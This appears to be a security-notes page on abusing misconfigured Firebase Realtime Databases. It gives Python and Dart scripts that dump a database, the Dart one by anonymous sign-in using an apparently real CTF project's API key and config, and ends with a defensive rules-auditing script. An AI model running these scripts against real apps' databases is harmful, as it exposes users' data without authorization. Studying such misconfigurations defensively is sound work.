# Abusing Firebase

Firebase provides detailed documentation and cross-platform app development SDKs, to help you build and ship apps for iOS, Android, the web, Flutter, Unity, and C++.\
The Firebase Realtime Database is a cloud-hosted database. Data is stored as JSON and synchronized in realtime to every connected client.

In some mobile applications the Firebase Realtime Database is left unrestricted, so its contents can be read with a simple curl command.

<figure><img src="/files/WySGGYIpusYBrLObXCON" alt=""><figcaption></figcaption></figure>

If access to Firebase depends on specific configuration values such as:

```
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b"
```

you can use one of two methods, depending on whether anonymous login is required.

Without anonymous login (Python):

```python
import pyrebase

# Values taken from the app's Firebase configuration
config = {
  "apiKey": "FIREBASE_API_KEY",
  "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
  "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
  "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}

firebase = pyrebase.initialize_app(config)

db = firebase.database()

# get() returns a response object; val() extracts the stored data
print(db.get().val())
```

With anonymous login (Dart):

```dart
import 'package:firebase_dart/auth.dart';
import 'package:firebase_dart/core.dart';
import 'package:firebase_dart/database.dart';
import 'package:firebase_dart/implementation/pure_dart.dart';

void main() async {
  // Initialise the pure-Dart Firebase implementation
  FirebaseDart.setup();

  // Values taken from the app's Firebase configuration
  var options = FirebaseOptions(
    appId: "1:713169998830:android:ee341ad82ed5dd924534ff",
    apiKey: "AIzaSyD3Z8qvgV-XdvDaeX-hnM8sOHXPhV_vIsw",
    messagingSenderId: "",
    authDomain: "my-ctf-2e70b-default-rtdb.firebaseapp.com",
    databaseURL: "https://my-ctf-2e70b-default-rtdb.firebaseio.com",
    storageBucket: "my-ctf-2e70b.appspot.com",
    projectId: "my-ctf-2e70b",
  );

  var app = await Firebase.initializeApp(options: options);

  // Sign in anonymously so that rules requiring an authenticated user pass
  var auth = FirebaseAuth.instanceFor(app: app);
  await auth.signInAnonymously();

  // Read the database root once
  var database = FirebaseDatabase(app: app);
  var dbRef = database.reference();
  var snap = await dbRef.once();

  print('Flag : ${snap.value}');
}
```
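Both cases above come down to the database's security rules. The following is an added example, not part of the original notes: a small auditor for a Realtime Database rules file that flags grants readable without login, grants that any signed-in user (anonymous included) satisfies, and child rules that have no effect because rules cascade downward. `SAMPLE_RULES`, `classify` and `audit` are hypothetical names, and the sample rules are constructed.

```python
import json

# Constructed sample rules (not from the page): a public-read root, plus
# child rules the author probably believed would restrict access.
SAMPLE_RULES = json.loads("""
{"rules": {
  ".read": true,
  ".write": "auth != null",
  "flags": {".read": "auth.uid === 'admin'"},
  "users": {"$uid": {".write": "auth.uid === $uid"}}
}}
""")

RANK = {None: 0, "any-auth": 1, "public": 2}

def classify(expr):
    """Return 'public', 'any-auth' or None for a .read/.write value."""
    text = str(expr).lower().replace(" ", "")
    if text == "true":
        return "public"  # readable/writable with no login at all
    # Satisfied by any signed-in user; anonymous sign-in counts when that
    # provider is enabled for the project.
    if text in ("auth!=null", "auth!==null", "auth.uid!=null", "auth.uid!==null"):
        return "any-auth"
    return None

def audit(node, path="/", inherited=None):
    """Walk the rules tree and return (path, operation, finding) tuples."""
    granted = dict(inherited or {})
    findings = []
    for op in (".read", ".write"):
        if op not in node:
            continue
        level, above = classify(node[op]), granted.get(op)
        if RANK[level] > RANK[above]:
            findings.append((path, op, level))
            granted[op] = level
        elif above:
            # Rules cascade: access granted at a parent path cannot be
            # revoked by a stricter rule further down.
            findings.append((path, op, "shadowed-by-" + above))
    for key, child in node.items():
        if isinstance(child, dict):
            findings += audit(child, path.rstrip("/") + "/" + key, granted)
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE_RULES["rules"]):
        print(*finding)
```

A rule that should exclude anonymous sessions has to say so explicitly, for example `auth != null && auth.provider != 'anonymous'`.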


